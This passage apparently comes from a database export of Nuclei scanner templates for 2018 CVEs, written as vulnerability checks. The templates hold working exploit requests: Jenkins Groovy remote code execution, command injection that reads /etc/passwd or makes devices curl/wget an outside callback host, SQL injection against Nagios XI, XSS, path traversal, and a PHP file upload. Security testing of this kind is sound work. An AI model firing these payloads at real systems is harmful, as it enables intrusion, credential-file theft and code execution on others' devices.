https://nvd.nist.gov/vuln/detail/CVE-2018-1000861\n - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595\n - http://packetstormsecurity.com/files/166778/Jenkins-Remote-Code-Execution.html\n - https://access.redhat.com/errata/RHBA-2019:0024\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1000861\n cwe-id: CWE-502\n epss-score: 0.9734\n epss-percentile: 0.99882\n cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*\n metadata:\n max-request: 1\n vendor: jenkins\n product: jenkins\n tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"package#vulntest\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a0e0d200c13ff780452945498a6718daad53e9ac916fec0ae1d8ec8279d22c87022026d4243303647e6e1fa58d9a299d869d55e93ab4c51fdffbfba18684c231c7f0:922c64590222798bb761d5b6d8e72950", "hash": "e0bbb5c72c960fe3aba77aad6f90b651", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801d" }, "name": "CVE-2018-10093.yaml", "content": "id: CVE-2018-10093\n\ninfo:\n name: AudioCodes 420HD - Remote Code Execution\n author: wisnupramoedya\n severity: high\n description: |\n AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the device, potentially leading to a complete compromise of the phone and unauthorized access to the VoIP network.\n remediation: |\n Apply the latest firmware 
update provided by AudioCodes to fix the vulnerability and ensure proper input validation.\n reference:\n - https://www.exploit-db.com/exploits/46164\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10093\n - https://www.exploit-db.com/exploits/46164/\n - http://seclists.org/fulldisclosure/2019/Jan/38\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2018-10093\n cwe-id: CWE-862\n epss-score: 0.06287\n epss-percentile: 0.92936\n cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: audiocodes\n product: 420hd_ip_phone_firmware\n tags: cve,cve2018,rce,iot,audiocode,edb,seclists,audiocodes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/command.cgi?cat%20/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"admin:.*:*sh$\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009717aaaf0b277c4052ff497e50b30916cc725ab5ee7ba798c188a4452303a46f022100f5620bfab5e60bb8ce234bb1ae2fe3a56850a5fa414dc90de85f0e9a5724834a:922c64590222798bb761d5b6d8e72950", "hash": "1fc9ab44bd07bb80ea193ec18493a6fd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801e" }, "name": "CVE-2018-10095.yaml", "content": "id: CVE-2018-10095\n\ninfo:\n name: Dolibarr <7.0.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to Dolibarr version 7.0.2 or later to mitigate this 
vulnerability.\n reference:\n - https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/\n - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56\n - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10095\n - http://www.openwall.com/lists/oss-security/2018/05/21/3\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-10095\n cwe-id: CWE-79\n epss-score: 0.95296\n epss-percentile: 0.99203\n cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dolibarr\n product: dolibarr\n tags: cve2018,cve,xss,dolibarr\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e638c1656a8815e12d2d2ad818bc56561808d9c56e7840b10d09443cdb5a4fcb022100acbf92f5d9af6213135181dfd35e83357559a6ab1db83c6db9d5a36579e22287:922c64590222798bb761d5b6d8e72950", "hash": "0513f4a985add0342cce29841261f234", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30801f" }, "name": "CVE-2018-10141.yaml", "content": "id: CVE-2018-10141\n\ninfo:\n name: Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the 
victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability.\n reference:\n - https://security.paloaltonetworks.com/CVE-2018-10141\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10141\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-10141\n cwe-id: CWE-79\n epss-score: 0.00126\n epss-percentile: 0.46296\n cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: paloaltonetworks\n product: pan-os\n tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'var valueUser = \"j\";-alert(1)-\"x\";'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022018f9350a51b781627e508e4ea73cb51e957d0a25e20e8c48fddab20c83c420de022100e3b19a249e90117477ab0f47433355e22b384c3b92322dd9200df419034324be:922c64590222798bb761d5b6d8e72950", "hash": "eb27ce9799fe06626349e465eb8f8ac5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308020" }, "name": "CVE-2018-10201.yaml", "content": "id: CVE-2018-10201\n\ninfo:\n name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal\n author: 0x_akoko\n severity: high\n description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files from the target system.\n remediation: |\n Apply the latest security patches or updates provided by Ncomputing to fix 
the directory traversal vulnerability.\n reference:\n - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10201\n - http://www.kwell.net/kwell_blog/?p=5199\n - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es\n - https://support.ncomputing.com/portal/kb/articles/ncomputing-health-monitor-server-vulnerability-patch\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-10201\n cwe-id: CWE-22\n epss-score: 0.04525\n epss-percentile: 0.91637\n cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: ncomputing\n product: vspace_pro\n tags: cve,cve2018,ncomputing,lfi,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini'\n - '{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini'\n - '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini'\n - '{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4b0a004830460221008cc9ffc3136acb7533e4d2b6f873e5f4814bfebe687cc77653ef5f49723851bf022100f905b97f3c07686c81b4f1fb0bf84c6ffd2379b58246323892260ede3a60fc98:922c64590222798bb761d5b6d8e72950", "hash": "44029c098922da74b6229875d21c6aca", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308021" }, "name": "CVE-2018-10230.yaml", "content": "id: CVE-2018-10230\n\ninfo:\n name: Zend Server <9.13 - Cross-Site Scripting\n author: marcos_iaf\n severity: medium\n description: |\n Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter.\n impact: |\n Successful exploitation of this 
vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability.\n reference:\n - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf\n - https://www.zend.com/en/products/server/release-notes\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10230\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-10230\n cwe-id: CWE-79\n epss-score: 0.00122\n epss-percentile: 0.46318\n cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zend\n product: zend_server\n tags: cve,cve2018,xss,zend\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"is not allowed to open debug sessions\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950", "hash": "bc35fbfcb2e2876035683dbed2d94923", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308022" }, "name": "CVE-2018-10562.yaml", "content": "id: CVE-2018-10562\n\ninfo:\n name: Dasan GPON Devices - Remote Code Execution\n author: gy741\n severity: critical\n description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. 
Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router\n - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10562\n - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-10562\n cwe-id: CWE-78\n epss-score: 0.97441\n epss-percentile: 0.99945\n cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dasannetworks\n product: gpon_router_firmware\n tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /GponForm/diag_Form?images/ HTTP/1.1\n Host: {{Hostname}}\n\n XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n - |\n POST /GponForm/diag_Form?images/ HTTP/1.1\n Host: {{Hostname}}\n\n XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 
4a0a00473045022100eff8002cdfe102f6a45b3310a529b3082ffce269cf60f0c09c44bf7d7ffbd0480220239d1b6bfa938a51d3f70bafedef9c3b99f833dfb44e2580e054d49a0a86147e:922c64590222798bb761d5b6d8e72950", "hash": "9389cf0bbfebc8b2b8614a34679b2934", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308023" }, "name": "CVE-2018-10735.yaml", "content": "id: CVE-2018-10735\n\ninfo:\n name: NagiosXI <= 5.4.12 `commandline.php` SQL injection\n author: DhiyaneshDk\n severity: high\n description: |\n A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.\n reference:\n - https://vulners.com/seebug/SSV:97266\n - https://github.com/chaitin/xray/blob/master/pocs/nagio-cve-2018-10735.yml\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2018-10735\n cwe-id: CWE-89\n epss-score: 0.00403\n epss-percentile: 0.7323\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nagios\n product: nagios_xi\n fofa-query: app=\"Nagios-XI\"\n tags: cve,cve2018,nagios,sqli\n\nvariables:\n num: \"{{rand_int(2000000000, 2100000000)}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n# digest: 490a00463044022035a7d92fb1c6bdc0292d17ac1a892eff48264d750e529eaa1738dc451e31382702204c7fd46d051494a76df2f08a648ed4cac0cadb12ea23ac096fa34020eb4e2fa1:922c64590222798bb761d5b6d8e72950", "hash": "5e03cb3b69cbe001d126e75c01e3f33b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308024" }, "name": "CVE-2018-10736.yaml", "content": "id: CVE-2018-10736\n\ninfo:\n name: NagiosXI <= 5.4.12 - SQL injection\n author: DhiyaneshDK\n severity: high\n description: |\n A SQL injection issue was discovered in Nagios XI before 5.4.13 via the 
admin/info.php key1 parameter.\n reference:\n - https://github.com/0ps/pocassistdb\n - https://github.com/jweny/pocassistdb\n - https://vulners.com/seebug/SSV:97266\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2018-10736\n cwe-id: CWE-89\n epss-score: 0.00403\n epss-percentile: 0.7323\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nagios\n product: nagios_xi\n fofa-query: app=\"Nagios-XI\"\n tags: cve,cve2018,nagios,sqli\n\nvariables:\n num: \"{{rand_int(2000000000, 2100000000)}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n# digest: 4b0a0048304602210096f6d47bc3a2fd2ff957df8bdb5367c2223cc113bd088a105e29d264e9bc7de102210090f4905b4787b7185c8c9495b3de6a65eb1aa90ca66a3e97e77904bdc1d13a09:922c64590222798bb761d5b6d8e72950", "hash": "e5d449137516cc1cafc90e82ecc5d49b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308025" }, "name": "CVE-2018-10737.yaml", "content": "id: CVE-2018-10737\n\ninfo:\n name: NagiosXI <= 5.4.12 logbook.php SQL injection\n author: DhiyaneshDK\n severity: high\n description: |\n A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.\n reference:\n - https://vulners.com/seebug/SSV:97267\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10737\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2018-10737\n cwe-id: CWE-89\n epss-score: 0.00403\n epss-percentile: 0.7323\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nagios\n product: nagios_xi\n fofa-query: app=\"Nagios-XI\"\n tags: cve,cve2018,nagios,sqli\n\nvariables:\n num: \"{{rand_int(2000000000, 
2100000000)}}\"\n\nhttp:\n - raw:\n - |\n POST /nagiosql/admin/logbook.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n# digest: 4b0a00483046022100f949d4089c1e58b578466210669aa11213a35c30675c334422db2a397452a130022100efde25a1cf6d6e04b0272e13b7dbedaa4967cdef95f25098659f2153a00df361:922c64590222798bb761d5b6d8e72950", "hash": "b18669f8a4cf42932015dfc88fabe786", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308026" }, "name": "CVE-2018-10738.yaml", "content": "id: CVE-2018-10738\n\ninfo:\n name: NagiosXI <= 5.4.12 menuaccess.php - SQL injection\n author: DhiyaneshDk\n severity: high\n description: |\n A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.\n reference:\n - https://qkl.seebug.org/vuldb/ssvid-97268\n - https://vuldb.com/de/?id.117807\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2018-10738\n cwe-id: CWE-89\n epss-score: 0.00403\n epss-percentile: 0.7323\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nagios\n product: nagios_xi\n fofa-query: app=\"Nagios-XI\"\n tags: cve,cve2018,nagios,sqli\n\nvariables:\n num: \"{{rand_int(2000000000, 2100000000)}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/nagiosql/admin/menuaccess.php\"\n headers:\n Content-Type: application/x-www-form-urlencoded\n body: \"selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\"\n\n 
matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n# digest: 490a0046304402202285ef8eb065ed205938c23f3c003cc2d946d8ab8a6c8c1bd97862cebffd6db60220284522e629f3ac4055349fd664d75a2645f27c19f847da1cb7aa77df38fd73b8:922c64590222798bb761d5b6d8e72950", "hash": "2d38b210141b42b6b56ce5142115278e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308027" }, "name": "CVE-2018-10818.yaml", "content": "id: CVE-2018-10818\n\ninfo:\n name: LG NAS Devices - Remote Code Execution\n author: gy741\n severity: critical\n description: LG NAS devices contain a pre-auth remote command injection via the \"password\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by LG to mitigate this vulnerability.\n reference:\n - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/\n - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818\n classification:\n cve-id: CVE-2018-10818\n metadata:\n max-request: 2\n tags: cve,cve2018,lg-nas,rce,oast,injection\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /system/sharedir.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n - |\n POST /en/php/usb_sync.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# 
digest: 4a0a0047304502202b56677fec54d514978c64631558171a8f9588ca78711315dd08583d0ed373340221009dff21f2f19a0772452e60725b3701999ff6c59a8bdb380e982af97876bcb175:922c64590222798bb761d5b6d8e72950", "hash": "1dc884bf84545cd732f92ad803939266", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308028" }, "name": "CVE-2018-10822.yaml", "content": "id: CVE-2018-10822\n\ninfo:\n name: D-Link Routers - Local File Inclusion\n author: daffainfo\n severity: high\n description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the target system\n remediation: |\n Apply the latest firmware update provided by D-Link to fix the vulnerability\n reference:\n - https://www.exploit-db.com/exploits/45678\n - http://sploit.tech/2018/10/12/D-Link.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10822\n - https://seclists.org/fulldisclosure/2018/Oct/36\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-10822\n cwe-id: CWE-22\n epss-score: 0.10309\n epss-percentile: 0.94824\n cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dwr-116_firmware\n tags: cve2018,cve,dlink,edb,seclists,lfi,router\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/uir//etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
490a00463044022023b69fc16b591f910806097c3c53ecff4c83e36806905b7a865a36fa93bc766f02202fe13b9a6e52cc4f9a56f91c5fc5cdd90030c89d3a2015b6e4658c9d9ac4b1a8:922c64590222798bb761d5b6d8e72950", "hash": "49a5c230608014bd2f56e918c97adcb9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308029" }, "name": "CVE-2018-10823.yaml", "content": "id: CVE-2018-10823\n\ninfo:\n name: D-Link Routers - Remote Command Injection\n author: wisnupramoedya\n severity: high\n description: |\n D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected router.\n remediation: |\n Apply the latest firmware update provided by D-Link to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45676\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10823\n - https://seclists.org/fulldisclosure/2018/Oct/36\n - http://sploit.tech/2018/10/12/D-Link.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2018-10823\n cwe-id: CWE-78\n epss-score: 0.96737\n epss-percentile: 0.99597\n cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dwr-116_firmware\n tags: cve,cve2018,rce,iot,dlink,router,edb,seclists\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402203c3b74b5fd566685fbad5b11a5f88f2cbbaeb6a44476e6e1a11c8846c395474c022026262baad879004dfb8e0433aa4206ea581bcd723c00763109d0eba3f5af5e98:922c64590222798bb761d5b6d8e72950", "hash": "7f3ba7797c5a3e6c7aeec95070ab3fc9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802a" }, "name": "CVE-2018-10942.yaml", "content": "id: CVE-2018-10942\n\ninfo:\n name: Prestashop AttributeWizardPro Module - Arbitrary File Upload\n author: MaStErChO\n severity: critical\n description: |\n The Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a PHP file. This template is intrusive: it uploads a randomly named .php file through the module's file_upload.php and then requests it back from file_uploads/ to confirm the upload.\n reference:\n - https://webcache.googleusercontent.com/search?q=cache:y0TbS2LsRfoJ:www.vfocus.net/art/20160629/12773.html&hl=en&gl=en\n - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10942\n classification:\n cve-id: CVE-2018-10942\n metadata:\n max-request: 8\n tags: prestashop,attributewizardpro,intrusive,file-upload\n\nvariables:\n filename: '{{rand_base(7, \"abc\")}}'\n\nhttp:\n - raw:\n - |\n POST /modules/{{paths}}/file_upload.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818\n\n --ba1f796d0aa2482e9c51c81ae6087818\n Content-Disposition: form-data; name=\"userfile\"; filename=\"{{filename}}.php\"\n Content-Type: multipart/form-data\n\n {{randstr}}\n --ba1f796d0aa2482e9c51c81ae6087818--\n\n - |\n GET /modules/{{paths}}/file_uploads/{{file}} HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n paths:\n - 'attributewizardpro'\n - '1attributewizardpro'\n - 'attributewizardpro.OLD'\n - 'attributewizardpro_x'\n\n stop-at-first-match: true\n host-redirects: true\n max-redirects: 3\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - '{{filename}}'\n\n - type: word\n part: body_2\n words:\n - '{{randstr}}'\n\n 
